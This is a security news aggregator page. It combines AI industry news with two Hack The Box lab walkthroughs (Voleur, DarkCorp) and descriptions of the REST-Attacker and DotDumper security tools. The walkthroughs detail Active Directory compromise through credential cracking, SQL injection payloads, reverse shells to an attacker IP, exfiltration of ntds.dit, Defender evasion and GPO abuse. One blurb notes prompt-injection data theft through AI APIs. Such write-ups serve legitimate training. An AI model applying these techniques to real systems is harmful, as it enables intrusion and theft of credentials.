Normal view
-
HackRead
- Quttera Launches “Evidence-as-Code” API to Automate Security Compliance for SOC 2 and PCI DSS v4.0
OpenAI API User Data Exposed in Mixpanel Breach, ChatGPT Unaffected
Anthropic introduces cheaper, more powerful, more efficient Opus 4.5 model
Anthropic today released Opus 4.5, its flagship frontier model, and it brings improvements in coding performance, as well as some user experience improvements that make it more generally competitive with OpenAI’s latest frontier models.
Perhaps the most prominent change for most users is that in the consumer app experiences (web, mobile, and desktop), Claude will be less prone to abruptly hard-stopping conversations because they have run too long. The improvement to memory within a single conversation applies not just to Opus 4.5, but to any current Claude models in the apps.
Users who experienced abrupt endings (despite having room left in their session and weekly usage budgets) were hitting a hard context window (200,000 tokens). Whereas some large language model implementations simply start trimming earlier messages from the context when a conversation runs past the maximum in the window, Claude simply ended the conversation rather than allow the user to experience an increasingly incoherent conversation where the model would start forgetting things based on how old they are.


© Anthropic
Google tells employees it must double capacity every 6 months to meet AI demand
While AI bubble talk fills the air these days, with fears of overinvestment that could pop at any time, something of a contradiction is brewing on the ground: Companies like Google and OpenAI can barely build infrastructure fast enough to fill their AI needs.
During an all-hands meeting earlier this month, Google’s AI infrastructure head Amin Vahdat told employees that the company must double its serving capacity every six months to meet demand for artificial intelligence services, reports CNBC. The comments show a rare look at what Google executives are telling its own employees internally. Vahdat, a vice president at Google Cloud, presented slides to its employees showing the company needs to scale “the next 1000x in 4-5 years.”
While a thousandfold increase in compute capacity sounds ambitious by itself, Vahdat noted some key constraints: Google needs to be able to deliver this increase in capability, compute, and storage networking “for essentially the same cost and increasingly, the same power, the same energy level,” he told employees during the meeting. “It won’t be easy but through collaboration and co-design, we’re going to get there.”


OpenAI walks a tricky tightrope with GPT-5.1’s eight new personalities
On Wednesday, OpenAI released GPT-5.1 Instant and GPT-5.1 Thinking, two updated versions of its flagship AI models now available in ChatGPT. The company is wrapping the models in the language of anthropomorphism, claiming that they’re warmer, more conversational, and better at following instructions.
The release follows complaints earlier this year that its previous models were excessively cheerful and sycophantic, along with an opposing controversy among users over how OpenAI modified the default GPT-5 output style after several suicide lawsuits.
The company now faces intense scrutiny from lawyers and regulators that could threaten its future operations. In that kind of environment, it’s difficult to just release a new AI model, throw out a few stats, and move on like the company could even a year ago. But here are the basics: The new GPT-5.1 Instant model will serve as ChatGPT’s faster default option for most tasks, while GPT-5.1 Thinking is a simulated reasoning model that attempts to handle more complex problem-solving tasks.


© Chris Madden via Getty Images
SesameOp Backdoor Abused OpenAI Assistants API for Remote Access
Claude AI APIs Can Be Abused for Data Exfiltration
An attacker can inject indirect prompts to trick the model into harvesting user data and sending it to the attacker’s account.
The post Claude AI APIs Can Be Abused for Data Exfiltration appeared first on SecurityWeek.
Hack The Box: Voleur Machinen Walkthrough – Medium Difficulty
Introduction to Voleur:

In this write-up, we will explore the “Voleur” machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Voleur” machine from Hack The Box by achieving the following objectives:
User Flag:
I found a password-protected Excel file on an SMB share, cracked it to recover service-account credentials, used those credentials to obtain Kerberos access and log into the victim account, and then opened the user’s Desktop to read user.txt.
Root Flag:
I used recovered service privileges to restore a deleted administrator account, extracted that user’s encrypted credential material, decrypted it to obtain higher-privilege credentials, and used those credentials to access the domain controller and read root.txt.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial -Pn 10.10.11.76Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/voleur]
└──╼ $nmap -sC -sV -oA initial -Pn 10.10.11.76
# Nmap 7.94SVN scan initiated Thu Oct 30 09:26:48 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.048s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-30 20:59:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-10-30T20:59:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h32m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 30 09:27:43 2025 -- 1 IP address (1 host up) scanned in 55.54 secondsAnalysis:
- 53/tcp: DNS (Simple DNS Plus) – domain name resolution
- 88/tcp: Kerberos – Active Directory authentication service
- 135/tcp: MSRPC – Windows RPC endpoint mapper
- 139/tcp: NetBIOS-SSN – legacy file and printer sharing
- 389/tcp: LDAP – Active Directory directory service
- 445/tcp: SMB – file sharing and remote administration
- 464/tcp: kpasswd – Kerberos password change service
- 593/tcp: RPC over HTTP – remote procedure calls over HTTP
- 636/tcp: tcpwrapped – likely LDAPS (secure LDAP)
- 2222/tcp: SSH – OpenSSH on Ubuntu (remote management)
- 3268/tcp: Global Catalog (LDAP GC) – forest-wide directory service
- 3269/tcp: tcpwrapped – likely Global Catalog over LDAPS
Machine Enumeration:

impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt (Impacket v0.12.0) — TGT saved to ryan.naylor.ccache; note: significant clock skew with the DC may disrupt Kerberos operations.

impacket-getTGT used ryan.naylor’s credentials to request a Kerberos TGT from the domain KDC and saved it to ryan.naylor.ccache; that ticket lets anyone request service tickets and access AD services (SMB, LDAP, HTTP) as ryan.naylor until it expires or is revoked, so inspect it with KRB5CCNAME=./ryan.naylor.ccache && klist and, if the request was unauthorized, reset the account password and check KDC logs for suspicious AS-REQs.

Setting KRB5CCNAME=ryan.naylor.ccache tells the Kerberos libraries to use that credential cache file for authentication so Kerberos-aware tools (klist, smbclient -k, ldapsearch -Y GSSAPI, Impacket tools with -k) will present the saved TGT; after exporting, run klist to view the ticket timestamps and then use the desired Kerberos-capable client (or unset the variable when done).

nxc ldap connected to the domain controller’s LDAP (DC.voleur.htb:389) using Kerberos (-k), discovered AD info (x64 DC, domain voleur.htb, signing enabled, SMBv1 disabled) and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming those credentials are valid for LDAP access.

nxc smb connected to the domain controller on TCP 445 using Kerberos (-k), enumerated the host as dc.voleur.htb (x64) with SMB signing enabled and SMBv1 disabled, and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming SMB access to the DC which can be used to list or mount shares, upload/download files, or perform further AD discovery while the account’s privileges allow.
Bloodhound enumeration

Runs bloodhound-python to authenticate to the voleur.htb domain as ryan.naylor (using the provided password and Kerberos via -k), query the specified DNS server (10.10.11.76) and collect all AD data (-c All) across the domain (-d voleur.htb), then package the resulting JSON data into a zip file (–zip) ready for import into BloodHound for graph-based AD attack path analysis; this gathers users, groups, computers, sessions, ACLs, trusts, and other relationships that are sensitive — only run with authorization.

ryan.naylor is a member of Domain Users and First-line Technicians — Domain Users is the default domain account group with standard user privileges, while First-line Technicians is a delegated helpdesk/tech group that typically has elevated rights like resetting passwords, unlocking accounts, and limited workstation or AD object management; combined, these memberships let the account perform routine IT tasks and makes it a useful foothold for lateral movement or privilege escalation if abused, so treat it as sensitive and monitor or restrict as needed.
SMB enumeration

Connected to dc.voleur.htb over SMB using Kerberos authentication; authenticated as voleur.htb\ryan.naylor and enumerated shares: ADMIN$, C$, Finance, HR, IPC$ (READ), IT (READ), NETLOGON (READ), and SYSVOL (READ), with SMB signing enabled and NTLM disabled.

If impacket-smbclient -k dc.voleur.htb failed, target a specific share and provide credentials or use your Kerberos cache. For example, connect with Kerberos and no password to a known share: impacket-smbclient -k -no-pass //dc.voleur.htb/Finance after exporting KRB5CCNAME=./ryan.naylor.ccache, or authenticate directly with username and password: impacket-smbclient //dc.voleur.htb/Finance -u ryan.naylor -p HollowOct31Nyt; specifying the share usually succeeds when the root endpoint refuses connections.

Shares need to be selected from the enumerated list before accessing them.

The SMB session showed available shares (including hidden admin shares ADMIN$ and C$, domain shares NETLOGON and SYSVOL, and user shares like Finance, HR, IT); the command use IT switched into the IT share and ls will list that share’s files and directories — output depends on ryan.naylor’s permissions and may be empty or restricted if the account lacks write/list rights.

Directory listing shows a folder named First-Line Support — change into it with cd First-Line Support and run ls to view its contents.

Inside the First-Line Support folder, there is a single file named Access_Review.xlsx with a size of 16,896 bytes, along with the standard . and .. directories.

Retrieve or save the Access_Review.xlsx file from the share to the local system.

Saved the file locally on your machine.

The file Access_Review.xlsx is encrypted using CDFv2.

The file is password-protected and cannot be opened without the correct password.

Extracted the password hash from Access_Review.xlsx using office2john and saved it to a file named hash.

The output is the extracted Office 2013 password hash from Access_Review.xlsx in hashcat/John format, showing encryption type, iteration count, salt, and encrypted data, which can be used for offline password cracking attempts.

Hashcat could not identify any supported hash mode that matches the format of the provided hash.

CrackStation failed to find a viable cracking path.

After researching the hash, it’s confirmed as Office 2013 / CDFv2 (PBKDF2‑HMAC‑SHA1 with 100,000 iterations) and maps to hashcat mode 9600; use hashcat -m 9600 with targeted wordlists, masks, or rules (GPU recommended) but expect slow hashing due to the high iteration count — if hashcat rejects the format, update to the latest hashcat build or try John’s office2john/output path; only attempt cracking with proper authorization.

I found this guide on Medium that explains how to extract and crack the Office 2013 hash we retrieved


After performing a password enumeration, the credential football1 was identified, potentially belonging to the svc account. It is noteworthy that the Todd user had been deleted, yet its password remnants were still recoverable.

The Access_Review.xlsx file contained plaintext credentials for two service accounts: svc_ldap — M1XyC9pW7qT5Vn and svc_iis — N5pXyV1WqM7CZ8. These appear to be service-account passwords that could grant LDAP and IIS access; treat them as sensitive, rotate/reset the accounts immediately, and audit where and how the credentials were stored and used.

svc_ldap has GenericWrite over the Lacey user objects and WriteSPN on svc_winrm; next step is to request a service ticket for svc_winrm.

impacket-getTGT used svc_ldap’s credentials to perform a Kerberos AS-REQ to the domain KDC, received a valid TGT, and saved it to svc_ldap.ccache; that TGT can be used to request service tickets (TGS) and access domain services as svc_ldap until it expires or is revoked, so treat the ccache as a live credential and rotate/reset the account or investigate KDC logs if the activity is unauthorized.

Set the Kerberos credential cache to svc_ldap.ccache so that Kerberos-aware tools will use svc_ldap’s TGT for authentication.

Attempt to bypass the disabled account failed: no krbtgt entries were found, indicating an issue with the LDAP account used.

Run bloodyAD against voleur.htb as svc_ldap (Kerberos) targeting dc.voleur.htb to set the svc_winrm object’s servicePrincipalName to HTTP/fake.voleur.htb.

The hashes were successfully retrieved as shown previously.


Cracking failed when hashcat hit a segmentation fault.

Using John the Ripper, the Office hash was cracked and the password AFireInsidedeOzarctica980219afi was recovered — treat it as a live credential and use it only with authorization (e.g., to open the file or authenticate as the associated account).

Authenticate with kinit using the cracked password, then run evil-winrm to access the target.

To retrieve the user flag, run type user.txt in the compromised session.
Another way to retrieve user flag

Request a TGS for the svc_winrm service principal.

Use evil-winrm the same way as before to connect and proceed.

Alternatively, display the user flag with type C:\Users\<username>\Desktop\user.txt.
Escalate to Root Privileges Access
Privilege Escalation:

Enumerated C:\ and found an IT folder that warrants closer inspection.

The IT folder contains three directories — each checked next for sensitive files.

No relevant files or artifacts discovered so far.


The directories cannot be opened with the current permissions.

Runs bloodyAD against dc.voleur.htb as svc_ldap (authenticating with the given password and Kerberos) to enumerate all Active Directory objects that svc_ldap can write to; the get writable command lists objects with writable ACLs (e.g., GenericWrite, WriteSPN) and –include-del also returns deleted-object entries, revealing targets you can modify or abuse for privilege escalation (resetting attributes, writing SPNs, planting creds, etc.).

From the list of writable AD objects, locate the object corresponding to Todd Wolfe.

Located the object; proceed to restore it by assigning sAMAccountName todd.wolfe.

Runs bloodyAD against dc.voleur.htb as svc_ldap (Kerberos) to restore the deleted AD object todd.wolfe on the domain — this attempts to undelete the tombstoned account and reinstate its sAMAccountName; success depends on svc_ldap having sufficient rights and the object still being restorable.

The restoration was successful, so the next step is to verify whether the original password still works.

After evaluating options, launch runascs.exe to move forward with the attack path.

Execute RunasCS.exe to run powershell as svc_ldap using password M1XyC9pW7qT5Vn and connect back to 10.10.14.189:9007.

Established a reverse shell session from the callback.

Successfully escalated to and accessed the system as todd.wolfe.

Ultimately, all previously restricted directories are now visible.





You navigated into the IT share (Second-Line Support → Archived Users → todd.wolfe) and downloaded two DPAPI-related artefacts: the Protect blob at AppData\Roaming\Microsoft\Protect<SID>\08949382-134f-4c63-b93c-ce52efc0aa88 and the credential file at AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3; these are DPAPI master-key/credential blobs that can be used to recover saved secrets for todd.wolfe, when combined with the appropriate user or system keys, should be them as highly sensitive.
DPAPI Recovery and Abuse: How Encrypted Blobs Lead to Root

Using impacket-dpapi with todd.wolfe’s masterkey file and password (NightT1meP1dg3on14), the DPAPI master key was successfully decrypted; the output shows the master key GUID, lengths, and flags, with the decrypted key displayed in hex, which can now be used to unlock the user’s protected credentials and recover saved secrets from Windows.

The credential blob was decrypted successfully: it’s an enterprise-persisted domain password entry last written on 2025-01-29 12:55:19 for target Jezzas_Account with username jeremy.combs and password qT3V9pLXyN7W4m; the flags indicate it requires confirmation and supports wildcard matching. This is a live domain credential that can be used to authenticate to AD services or for lateral movement, so handle it as sensitive and test access only with authorization.

impacket-getTGT used jeremy.combs’s credentials to request a Kerberos TGT from the domain KDC and saved it to jeremy.combs.ccache; that TGT can be used to request service tickets (TGS) and authenticate to AD services (SMB, LDAP, WinRM, etc.) as jeremy.combs until it expires or is revoked, so inspect it with KRB5CCNAME=./jeremy.combs.ccache && klist and treat the cache as a live credential — rotate/reset the account or review KDC logs if the activity is unauthorized.

Set the Kerberos credential cache to jeremy.combs.ccache so Kerberos-aware tools will use jeremy.combs’s TGT for authentication.

Run bloodhound-python as jeremy.combs (password qT3V9pLXyN7W4m) using Kerberos and DNS server 10.10.11.76 to collect all AD data for voleur.htb and save the output as a zip for BloodHound import.

Account jeremy.combs is in the Third-Line Technicians group.

Connected to dc.voleur.htb with impacket-smbclient (Kerberos), switched into the IT share and listed contents — the directory Third-Line Support is present.

Downloaded two files from the share: the private SSH key id_rsa and the text file Note.txt.txt — treat id_rsa as a sensitive private key (check for a passphrase) and review Note.txt.txt for useful creds or instructions.

The note indicates that the administrator was dissatisfied with Windows Backup and has started configuring Windows Subsystem for Linux (WSL) to experiment with Linux-based backup tools. They are asking Jeremy to review the setup and implement or configure any viable backup solutions using the Linux environment. Essentially, it’s guidance to transition or supplement backup tasks from native Windows tools to Linux-based tools via WSL.


The key belongs to the svc_backup user, and based on the earlier port scan, port 2222 is open, which can be used to attempt a connection.

The only difference in this case is the presence of the backups directory.

There are two directories present: Active Directory and Registry.

Stream the raw contents of the ntds.dit file to a remote host by writing it out over a TCP connection.

The ntds.dit file was transferred to the remote host.

Stream the raw contents of the SYSTEM file to a remote host by writing it out over a TCP connection.

The SYSTEM file was transferred to the remote host.

That command runs impacket-secretsdump in offline mode against the dumped AD database and system hive — reading ntds.dit and SYSTEM to extract domain credentials and secrets (user NTLM hashes, cached credentials, machine account hashes, LSA secrets, etc.) for further offline analysis; treat the output as highly sensitive and use only with proper authorization.

Acquire an Administrator service ticket for WinRM access.

Authenticate with kinit using the cracked password, then run evil-winrm to access the target.

To retrieve the root flag, run type root.txt in the compromised session.
The post Hack The Box: Voleur Machinen Walkthrough – Medium Difficulty appeared first on Threatninja.net.
Advanced Serverless Security: Zero Trust Implementation with AI-Powered Threat Detection
Hack The Box: DarkCorp Machine Walkthrough – Insane Difficulity
Introduction to DarkCorp:

In this writeup, we will explore the “DarkCorp” machine from Hack The Box, categorized as an Insane difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “DarkCorp” machine from Hack The Box by achieving the following objectives:
User Flag:
Gained initial foothold via the webmail/contact vector, registered an account, abused the contact form, and executed a payload to spawn a reverse shell. From the shell, read user.txt to capture the user flag.
Root Flag:
Performed post-exploitation and credential harvesting (SQLi → hashes → cracked password thePlague61780, DPAPI master key recovery and Pack_beneath_Solid9! recovered), used recovered credentials and privilege escalation techniques to obtain root, then read root.txt to capture the root flag.
Enumerating the DarkCorp Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.54Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/darkcorp]
└──╼ $nmap -sC -sV -oA initial 10.10.11.54
# Nmap 7.94SVN scan initiated Sun Aug 17 03:07:38 2025 as: nmap -sC -sV -oA initial 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 17 03:08:04 2025 -- 1 IP address (1 host up) scanned in 25.73 seconds
┌─[dark@parrot]─[~/Documents/htb/darkcorp]
└──╼ $
Analysis:
- Port 22 (SSH): OpenSSH 9.2p1 on Debian — secure remote access; check for password authentication or weak credentials.
- Port 80 (HTTP): nginx 1.22.1 — web server serving GET/HEAD only; perform directory and file enumeration for further insights.
Web Enumeration:

Nothing noteworthy was found on the website itself.

A subdomain was discovered that leads to the DripMail Webmail interface.
Register a new account and enter the email

As a next step, proceed to register a new account.

Enter the required information to create the new account.

We successfully created the account, confirming that the DripMail Webmail portal’s registration process works correctly. This indicates that user registration is open; therefore, we can interact with the mail system. Consequently, this may enable further exploration, including login, email sending, and service enumeration.
Check your email inbox

A new email appeared in the inbox from no-reply@drip.htb, indicating that the system had sent an automated message; moreover, it may contain a verification notice, onboarding information, or credential-related details, all of which are worth reviewing for further clues.

However, it turned out to be just a welcome email from no-reply@drip.htb, providing no useful information.
Contact Form Exploitation

The site includes a contact form that attackers could potentially exploit.

We entered a non-deterministic key value into the input.

We sent the message successfully, confirming that the contact form works and accepts submissions.
CVE‑2024‑42009 — Web Enumeration with Burp Suite

Burp shows the contact form submission (POST) carrying the random key and payload, followed by a successful response.

We modified the contact-form recipient field and replayed the POST via Burp Repeater; the server returned 200 OK, and it delivered the message to admin@drip.htb.

We received a request for customer information.

Let’s start our listener
Contact Form Payload

Insert the base64-encoded string into the message.

The Burp Suite trace looks like the following.



A staff member sent an email.
Resetting the password

We need to change the password.

After setting the payload, we received a password reset link.

Let’s change the password as needed

We are provide with a dashboard
SQL injection discovered on dev-a3f1-01.drip.htb.

We accessed the user overview and discovered useful information.

The application is vulnerable to SQL injection.
SQLi Payload for Table Enumeration

The input is an SQL injection payload that closes the current query and injects a new one: it terminates the original statement, runs
SELECT table_name FROM information_schema.tables WHERE table_schema=’public’;
and uses — to comment out the remainder. This enumerates all table names in the public schema; the response (Users, Admins) shows the database exposed those table names, confirming successful SQLi and information disclosure.

The payload closes the current query and injects a new one:
SELECT column_name FROM information_schema.columns WHERE table_name=’Users’;–
which lists all column names for the Users table. The response (id, username, password, email, host_header, ip_address) confirms successful SQLi-driven schema enumeration and reveals sensitive columns (notably password and email) that could enable credential or user-data disclosure.

Obtained password hashes from the Users table (Users.password). These values are opaque; we should determine their type, attempt to crack only with authorisation, and protect them securely.
PostgreSQL File Enumeration

The SQL command SELECT pg_ls_dir('./'); invokes PostgreSQL’s pg_ls_dir() function to list all files and directories in the server process’s current directory (typically the database data or working directory). Because pg_ls_dir() exposes the filesystem view, it can reveal configuration files or other server-side files accessible to the database process — which is why it’s often used during post‑exploitation or SQLi-driven reconnaissance. Importantly, this function requires superuser privileges; therefore, a non‑superuser connection will be denied. Consequently, successful execution implies that the user has elevated database permissions.

The SQL command SELECT pg_read_file('PG_VERSION', 0, 200); calls PostgreSQL’s pg_read_file() to read up to 200 bytes starting at offset 0 from the file PG_VERSION on the database server. PG_VERSION normally contains the PostgreSQL version string, so a successful call discloses the DB version to the attacker — useful for fingerprinting — and typically requires superuser privileges, making its successful execution an indicator of elevated database access and a potential information‑disclosure risk.

Returning down the path, I spotted one; it would impress those who have beaten Cerberus…/../../ssssss


SSSD maintains its own local ticket credential caching mechanism (KCM), managed by the SSSD process. It stores a copy of the valid credential cache, while the corresponding encryption key is stored separately in /var/lib/sss/secrets/secrets.ldb and /var/lib/sss/secrets/.secrets.mkey.
Shell as postgres

Finally, we successfully received a reverse shell connection back to our machine; therefore, this confirmed that the payload executed correctly and established remote access as intended.

Nothing of significance was detected.

Discovered the database username and password.
Restore the Old email

Elevate the current shell to an interactive TTY.

The encrypted PostgreSQL backup dev-dripmail.old.sql.gpg is decrypted using the provided passphrase, and the resulting SQL dump is saved as dev-dripmail.old.sql. Consequently, this allows further inspection or restoration of the database for deeper analysis or recovery.

The output resembles what is shown above.


Found three hashes that can be cracked with Hashcat.

Hash Cracking via hashcat


We successfully recovered the password thePlague61780.

Since Hashcat managed to crack only one hash, we’ll therefore use CrackStation to attempt cracking the remaining two.
Bloodhound enumeration


Update the configuration file.
SSH as ebelford user

Established an SSH session to the machine as ebelforrd.

No binary found

Found two IP addresses and several subdomains on the target machine.

Update the subdomain entries in our /etc/hosts file.
Network Tunnelling and DNS Spoofing with sshuttle and dnschef

Use sshuttle to connect to the server and route traffic (like a VPN / port forwarding).

Additionally, dnschef was used to intercept and spoof DNS traffic during testing.
Gathering Information via Internal Status Monitor

Log in using the victor.r account credentials.


Click the check button to get a response

Replace the saved victor.r login details in Burp Suite.



Testing the suspected host and port for reachability.

Begin the NTLM relay/replay attack.


Leverage socatx64 to perform this activity.
Abuse S4U2Self and Gain a Shell on WEB-01

An LDAP interactive shell session is now running.


Run get_user_groups on svc_acc to list their groups.

Retrieved the SID associated with this action.


Retrieved the administrator.ccache Kerberos ticket.



We can read the user flag by typing “type user.txt” command
Escalate to Root Privileges Access on Darkcorp machine
Privilege Escalation:

Transfer sharpdpapi.exe to the target host.


Attempting to evade Windows Defender in a sanctioned test environment

The output reveals a DPAPI-protected credential blob located atC:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E. It references a master key with GUID {6037d071-...} and shows that the blob is protected using system-level DPAPI (CRYPTPROTECT_SYSTEM), with SHA-512 for hashing and AES-256 for encryption. Since the message indicates MasterKey GUID not in cache, the decryption cannot proceed until the corresponding master key is obtained — either from the user’s masterkey file or by accessing a process currently holding it in memory.

This output shows a DPAPI local credential file at C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ with the filename 32B2774DF751FF7E28E78AE75C237A1E. The system protects it using a DPAPI master key (GUID {6037d071-cac5-481e-9e08-c4296c0a7ff7}), applies SHA-512 for hashing, and uses AES-256 for encryption. Because the master key isn’t currently in the cache, we can’t decrypt the credential blob until we obtain that master key (for example from the masterkey file) or access the process that holds it in memory.

Direct file transfer through evil-winrm was unsuccessful.


Transform the file into base64 format.

We successfully recovered the decrypted key; as noted above, this confirms the prior output and therefore enables further analysis.
Access darkcorp machine via angela.w

Successfully recovered the password Pack_beneath_Solid9!


Retrieval of angela.w’s NT hash failed.


Attempt to gain access to the angela.w account via a different method.

Acquired the hash dump for angela.w.



Save the ticket as angela.w.adm.ccache.



Successful privilege escalation to root.



Retrieved password hashes.


Password reset completed and new password obtained.

Exploiting GPOs with pyGPOAbuse

Enumerated several GPOs in the darkcorp.htb domain; additionally, each entry shows the GPO GUID, display name, SYSVOL path, applied extension GUIDs, version, and the policy areas it controls (registry, EFS policy/recovery, Windows Firewall, security/audit, restricted groups, scheduled tasks). Furthermore, the Default Domain Policy and Default Domain Controllers Policy enforce core domain and DC security — notably, the DC policy has many revisions. Meanwhile, the SecurityUpdates GPO appears to manage scheduled tasks and update enforcement. Therefore, map these SYSVOL files to find promising escalation vectors: for example, check for misconfigured scheduled tasks, review EFS recovery settings for exposed keys, and identify privileged group memberships. Also, correlate GPO versions and recent changes to prioritize likely targets.




BloodHound identifies taylor as GPO manager — pyGPOAbuse is applicable, pending discovery of the GPO ID.

Force a Group Policy update using gpupdate /force.



Display the root flag with type root.txt.
The post Hack The Box: DarkCorp Machine Walkthrough – Insane Difficulity appeared first on Threatninja.net.
-
KitPloit
- REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations
REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations
REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.
Features
REST-Attacker currently provides these features:
- Automated generation of tests
- Utilize an OpenAPI description to automatically generate test runs
- 32 integrated security tests based on OWASP and other scientific contributions
- Built-in creation of security reports
- Streamlined API communication
- Custom request interface for the REST security use case (based on the Python3 requests module)
- Communicate with any generic REST API
- Handling of access control
- Background authentication/authorization with API
- Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
- Easy to use & extend
- Usable as standalone (CLI) tool or as a module
- Adapt test runs to specific APIs with extensive configuration options
- Create custom test cases or access control schemes with the tool's interfaces
Install
Get the tool by downloading or cloning the repository:
git clone https://github.com/RUB-NDS/REST-Attacker.git
You need Python >3.10 for running the tool.
You also need to install the following packages with pip:
python3 -m pip install -r requirements.txt
Quickstart
Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.
Get the list of supported test cases:
python3 -m rest_attacker --list
Basic test run (with load-time test case generation):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate
Full test run (with load-time and runtime test case generation + rate limit handling):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits
Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters
Rerun a test run from a report:
python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json
Documentation
Usage guides and configuration format documentation can be found in the documentation subfolders.
Troubleshooting
For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.
Contributing
Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code ammendments via a pull request.
Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.
License
This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.
DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files
An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.
The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.
Why DotDumper?
In brief, manual unpacking is a tedious process which consumes a disproportional amount of time for analysts. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. The lost valuable time could be used to dig into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. Afterall, analysts look for the few needles in the haystack.
So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.
Features
To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumper’s results of a packed AgentTesla stealer sample, the hashes of which are below.
| Hash type | Hash value |
|---|---|
| SHA-256 | b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d |
| SHA-1 | c10e48ee1f802f730f41f3d11ae9d7bcc649080c |
| MD-5 | 23541daadb154f1f59119952e7232d6b |
Using the command-line interface
